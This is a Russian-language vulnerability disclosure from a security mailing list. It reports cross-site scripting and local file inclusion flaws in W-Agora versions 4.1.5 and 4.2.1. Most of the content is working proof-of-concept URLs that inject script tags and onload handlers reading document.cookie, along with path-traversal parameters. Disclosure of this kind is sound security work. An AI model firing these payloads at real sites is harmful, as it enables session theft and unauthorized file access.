Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

AlstraSoft E-Friends 4.96 Multiple Remote Vulnerabilities

MyCart 2.0 Multiple Remote Vulnerabilities

XSS vulnerability in Zomplog

SQL injection in BloofoxCMS registration plugin

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	28.10.2010
Subject:	Новые уязвимости в W-Agora

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых Cross-Site Scripting и Local File
Inclusion уязвимостях в W-Agora.

XSS (WASC-08):

http://site/news/for-print.
php3?bn=x&key=1282850719%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/news/for-print.php3?bn=%3Cbody%20onload=alert(document.
cookie)%3E

http://site/news/login.
php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Уязвимость работает в версии 4.1.5, но не работает в 4.2.1.

http://site/news/login.php3?bn=%3Cbody%20onload=alert(document.
cookie)%3E

Local File Inclusion (WASC-31):

Можно инклюдить php-файлы (с расширением php3 в версии W-Agora 4.1.5 или с
расширением php в версии 4.2.1).

В папке conf:

http://site/news/for-print.php3?bn=1

http://site/news/login.php3?bn=1

В любой папке (только на Windows-серверах):

http://site/news/for-print.php3?bn=..\1

http://site/news/login.php3?bn=..\1

Уязвимы W-Agora 4.2.1 и предыдущие версии. В последних версиях системы
скрипты php3 имеют расширение php.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4484/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua